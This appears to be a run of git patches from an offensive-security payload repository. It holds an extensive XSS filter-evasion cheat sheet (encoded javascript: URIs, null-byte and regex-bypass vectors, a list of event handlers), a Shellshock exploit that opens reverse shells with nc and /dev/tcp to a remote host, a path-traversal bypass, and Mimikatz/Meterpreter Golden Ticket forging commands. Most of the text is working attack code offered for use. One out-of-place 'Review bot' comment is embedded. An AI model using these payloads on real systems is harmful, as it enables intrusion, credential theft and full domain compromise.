ascript:alert('XSS');"> - Embedded tab to break up the cross site scripting attack. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Embedded Encoded Tab - <IMG SRC="jav&#x09;ascript:alert('XSS');"> - Embedded encoded tab to break up XSS. For some reason Opera does not allow the encoded tab, but it does allow the previous tab XSS and encoded newline and carriage returns below. 
- - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Embedded Newline - <IMG SRC="jav&#x0A;ascript:alert('XSS');"> - Embedded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Embedded Carriage Return - <IMG SRC="jav&#x0D;ascript:alert('XSS');"> - Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Multiline w/Carriage Returns - <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > - - Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector). 
- - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Null Chars 1 - perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out - - Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Null Chars 2 - perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out - - Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I've seen this vector bypass some of the most restrictive XSS filters to date - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Spaces/Meta Chars - <IMG SRC=" &#14; javascript:alert('XSS');"> - Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word "javascript:" - which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal). 
- - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Non-Alpha/Non-Digit - <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> - Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT/XSS\s" - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Non-Alpha/Non-Digit Part 2 - <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> - Non-alpha-non-digit XSS part 2. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this does not apply to the grave accent char as seen here. - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - No Closing Script Tag - <SCRIPT SRC=http://ha.ckers.org/xss.js - In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. 
You can add quotes if you need to, but they're not needed generally. - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Protocol resolution in script tags - <SCRIPT SRC=//ha.ckers.org/.j> - This particular variant was submitted by Lukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the MIME type because the browser knows it in context of a SCRIPT tag. - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Half-Open HTML/JavaScript - <IMG SRC="javascript:alert('XSS')" - Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the "javascript:" directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close > tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex: - /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ -As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag. 
- - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Double open angle brackets - <IFRAME SRC=http://ha.ckers.org/scriptlet.html < - This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Extraneous Open Brackets - <<SCRIPT>alert("XSS");//<</SCRIPT> - (Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Malformed IMG Tags - <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> - Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. 
I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - No Quotes/Semicolons - <SCRIPT>a=/XSS/ -alert(a.source)</SCRIPT> - No single quotes or double quotes or semicolons. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Event Handlers List 1 - See Below - Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (http://www.secaron.de/) for the HTML+TIME updates: - --FSCommand() (execute from within an embedded Flash object) - --onAbort() (when user aborts the loading of an image) - --onActivate() (when object is set as the active element) - --onAfterPrint() (activates after user prints or previews print job) - --onAfterUpdate() (activates on data object after updating data in the source object) - --onBeforeActivate() (fires before the object is set as the active element) - --onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard (use the execCommand("Copy") function) - --onBeforeCut() (attacker executes the attack string right before a selection is cut) - --onBeforeDeactivate() (fires right after the activeElement is changed from the current object) - --onBeforeEditFocus() (fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected) - --onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function) - --onBeforePrint() (user 
would need to be tricked into printing or attacker could use the print() or execCommand("Print") function) - --onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent) - --onBegin() (fires immediately when the element's timeline begins) - --onBlur() (in the case where another popup is loaded and window loses focus) - --onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window) - --onCellChange() (fires when data changes in the data provider) - --onChange() (fires when select, text, or TEXTAREA field loses focus and its value has been modified) - --onClick() (fires when someone clicks on a form) - --onContextMenu() (user would need to right click on attack area) - --onControlSelect() (fires when the user is about to make a control selection of the object) - --onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command) - --onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command) - --onDataAvailible() (user would need to change data in an element, or attacker could perform the same function) - --onDataSetChanged() (fires when the data set exposed by a data source object changes) - --onDataSetComplete() (fires to indicate that all data is available from the data source object) - --onDblClick() (fires when user double-clicks a form element or a link) - --onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document) - --onDrag() (requires that the user drags an object) - --onDragEnd() (requires that the user drags an object) - --onDragLeave() (requires that the user drags an object off a valid location) - --onDragEnter() (requires that the user drags an object into a valid location) - --onDragOver() (requires that the user drags an object into a valid 
location) - --onDragDrop() (user drops an object (e.g. file) onto the browser window) - --onDrop() (fires when user drops an object (e.g. file) onto the browser window) - - - - Browser support: - - - Event Handlers List 2 - See Below - - -onEnd() (fires when the timeline ends. This can be exploited, like most of the HTML+TIME event handlers by doing something like <P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">) - --onError() (loading of a document or image causes an error) - --onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object) - --onFilterChange() (fires when a visual filter completes state change) - --onFinish() (attacker could create the exploit when marquee is finished looping) - --onFocus() (attacker executes the attack string when the window gets focus) - --onFocusIn() (attacker executes the attack string when window gets focus) - --onFocusOut() (attacker executes the attack string when window loses focus) - --onHelp() (attacker executes the attack string when users hits F1 while the window is in focus) - --onKeyDown() (fires when user depresses a key) - --onKeyPress() (fires when user presses or holds down a key) - --onKeyUp() (fires when user releases a key) - --onLayoutComplete() (user would have to print or print preview) - --onLoad() (attacker executes the attack string after the window loads) - --onLoseCapture() (can be exploited by the releaseCapture() method) - --onMediaComplete() (when a streaming media file is used, this event could fire before the file starts playing) - --onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem) - --onMouseDown() (the attacker would need to get the user to click on an image) - --onMouseEnter() (fires when cursor moves over an object or area) - --onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again) - 
--onMouseMove() (the attacker would need to get the user to mouse over an image or table) - --onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again) - --onMouseOver() (fires when cursor moves over an object or area) - --onMouseUp() (the attacker would need to get the user to click on an image) - --onMouseWheel() (the attacker would need to get the user to use their mouse wheel) - --onMove() (user or attacker would move the page) - --onMoveEnd() (user or attacker would move the page) - --onMoveStart() (user or attacker would move the page) - --onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline) - --onPaste() (user would need to paste or attacker could use the execCommand("Paste") function) - --onPause() (fires on every element that is active when the timeline pauses, including the body element) - --onProgress() (attacker would use this as a flash movie was loading) - --onPropertyChange() (user or attacker would need to change an element property) - --onReadyStateChange() (user or attacker would need to change an element property) - - - - Browser support: - - - Event Handlers List 3 - See Below - -onRepeat() (fires once for each repetition of the timeline, excluding the first full cycle) - --onReset() (fires when user or attacker resets a form) - --onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) - --onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) - --onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) - --onResume() (fires on every element that becomes active when the timeline resumes, including the body element) - --onReverse() (if the element has a repeatCount greater than one, this event fires every time the 
timeline begins to play backward) - --onRowEnter() (user or attacker would need to change a row in a data source) - --onRowExit() (user or attacker would need to change a row in a data source) - --onRowDelete() (user or attacker would need to delete a row in a data source) - --onRowInserted() (user or attacker would need to insert a row in a data source) - --onScroll() (user would need to scroll, or attacker could use the scrollBy() function) - --onSeek() (fires when the timeline is set to play in any direction other than forward) - --onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) - --onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) - --onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) - --onStart() (fires at the beginning of each marquee loop) - --onStop() (user would need to press the stop button or leave the webpage) - --onSynchRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire) - --onSubmit() (requires attacker or user submits a form) - --onTimeError() (fires when user or attacker sets a time property, such as "dur", to an invalid value) - --onTrackChange() (fires when user or attacker changes track in a playList) - --onUnload() (fires when the user clicks any link or presses the back button or attacker forces a click) - --onURLFlip() (fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file) - --seekSegmentTime() (locates the specified point on the element's segment time line and begins playing from that point. 
The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.) - - - - Browser support: - - - Evade Regex Filter 1 - <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> - - For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of the following regex filter: - /<script[^>]+src/i - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Evade Regex Filter 2 - <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> - For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter: - /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i - -(this is an important one, because I've seen this regex in the wild) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Evade Regex Filter 3 - <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> - Another XSS to evade this regex filter: - /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Evade Regex Filter 4 - <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> - Yet another XSS to evade the same filter: - /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i -The only thing I've seen work against this XSS attack if you still want to allow <SCRIPT> tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span 
class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Evade Regex Filter 5 - <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> - And one last XSS attack (using grave accents) to evade this regex: - /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Filter Evasion 1 - <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> - - This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Filter Evasion 2 - <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> - Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - IP Encoding - <A HREF="http://66.102.7.147/">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - URL Encoding - <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). 
- - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Dword Encoding - <A HREF="http://1113982867/">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Hex Encoding - <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). -The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex digit is not required. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Octal Encoding - <A HREF="http://0102.0146.0007.00000223/">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). -Padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc... - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Mixed Encoding - <A HREF="h tt p://6&#09;6.000146.0x7.147/">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). -The tabs and newlines only work if this is encapsulated with quotes. 
- - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Protocol Resolution Bypass - <A HREF="//www.google.com/">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). -Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to Ozh (http://planetOzh.com/) for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Firefox Lookups 1 - <A HREF="//google">XSS</A> - Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatenate several keywords by using something like the following "keyword:XSS+RSnake" - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Firefox Lookups 2 - <A HREF="http://ha.ckers.org@google">XSS</A> - This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. 
If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera. - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Firefox Lookups 3 - <A HREF="http://google:ha.ckers.org">XSS</A> - This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"). - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Removing Cnames - <A HREF="http://google.com/">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). -When combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Extra dot for Absolute DNS - <A HREF="http://www.google.com./">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). 
- - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - JavaScript Link Location - <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed) -JavaScript link location - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Content Replace - <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> - Content replace as an attack vector (assuming "http://www.google.com/" is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector ("java&#x26;#x09;script:" was converted into "java&#x09;script:". - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - diff --git a/XSS Injection/Files/xss.url.url b/XSS Injection/Files/xss.url.url new file mode 100644 index 00000000..325158b1 --- /dev/null +++ b/XSS Injection/Files/xss.url.url @@ -0,0 +1,3 @@ + + + \ No newline at end of file From 8dffb59ac51effed3a964aa5050476bf124af6c8 Mon Sep 17 00:00:00 2001 
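Review bot: The new file in this hunk is named `XSS Injection/Files/xss.url.url`, a doubled extension that looks like a naming slip (the `.url` shortcut format already carries its own extension); if a single `.url` was intended, rename it before merge. The three added lines also land with `\ No newline at end of file`, so a trailing newline would make later diffs against this file cleaner.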
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 18 Aug 2019 22:24:48 +0200 Subject: [PATCH 042/222] Pspy + Silver Ticket + MSSQL connect --- CVE Exploits/README.md | 5 +- Directory Traversal/README.md | 9 ++ File Inclusion/README.md | 2 +- .../Active Directory Attack.md | 112 ++++++++++++------ .../Linux - Privilege Escalation.md | 8 ++ .../Windows - Persistence.md | 13 ++ .../Windows - Privilege Escalation.md | 2 + SQL Injection/MSSQL Injection.md | 33 +++++- SQL Injection/README.md | 1 + 9 files changed, 141 insertions(+), 44 deletions(-) diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md index 41b223c6..8563a19e 100644 --- a/CVE Exploits/README.md +++ b/CVE Exploits/README.md @@ -10,8 +10,9 @@ The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptograph Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system. -```bash -echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n +```powershell +echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\r\n" +curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi" ``` ## CVE-2017-5638 - Apache Struts 2 diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index cedc13ca..1420178b 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md 
@@ -9,11 +9,13 @@ * [16 bits Unicode encoding](#) * [UTF-8 Unicode encoding](#) * [Bypass "../" replaced by ""](#) + * [Bypass "../" with ";"](#) * [Double URL encoding](#) * [UNC Bypass](#unc-bypass) * [Path Traversal](#path-traversal) * [Interesting Linux files](#) * [Interesting Windows files](#) +* [References](#references) ## Tools @@ -62,6 +64,13 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings ...\.\ ``` +### Bypass "../" with ";" + +```powershell +..;/ +http://domain.tld/page.jsp?include=..;/..;/sensitive.txt +``` + ### Double URL encoding ```powershell diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 255a83d7..29fbf59d 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -46,7 +46,7 @@ http://example.com/index.php?page=../../../etc/passwd ### Null byte -:warning: In versions of PHP below 5.3 we can terminate with null byte. +:warning: In versions of PHP below 5.3.4 we can terminate with null byte. ```powershell http://example.com/index.php?page=../../../etc/passwd%00 diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 91056a72..0ee74089 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -9,8 +9,8 @@ * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol) * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit) * [Password in AD User comment](#password-in-ad-user-comment) - * [Golden Tickets](#passtheticket-golden-tickets) - * [Silver Tickets](#passtheticket-silver-tickets) + * [Pass-the-Ticket Golden Tickets](#passtheticket-golden-tickets) + * [Pass-the-Ticket Silver Tickets](#passtheticket-silver-tickets) * [Kerberoast](#kerberoast) * [KRB_AS_REP roasting](#krb_as_rep-roasting) * [Pass-the-Hash](#pass-the-hash) 
@@ -393,31 +393,33 @@ or dump the Active Directory and `grep` the content. ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ ``` -### PassTheTicket Golden Tickets +### Pass-the-Ticket Golden Tickets -Forging a TGT require the krbtgt key +Forging a TGT require the krbtgt NTLM hash -Mimikatz version +> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt ntlm hash must be used. + +#### Using Mimikatz ```powershell -Get info - Mimikatz +# Get info - Mimikatz lsadump::dcsync /user:krbtgt lsadump::lsa /inject /name:krbtgt -Forge a Golden ticket - Mimikatz +# Forge a Golden ticket - Mimikatz kerberos::purge kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt kerberos::tgt ``` -Meterpreter version +#### Using Meterpreter ```powershell -Get info - Meterpreter(kiwi) +# Get info - Meterpreter(kiwi) dcsync_ntlm krbtgt dcsync krbtgt -Forge a Golden ticket - Meterpreter +# Forge a Golden ticket - Meterpreter load kiwi golden_ticket_create -d -k -s -u -t golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t 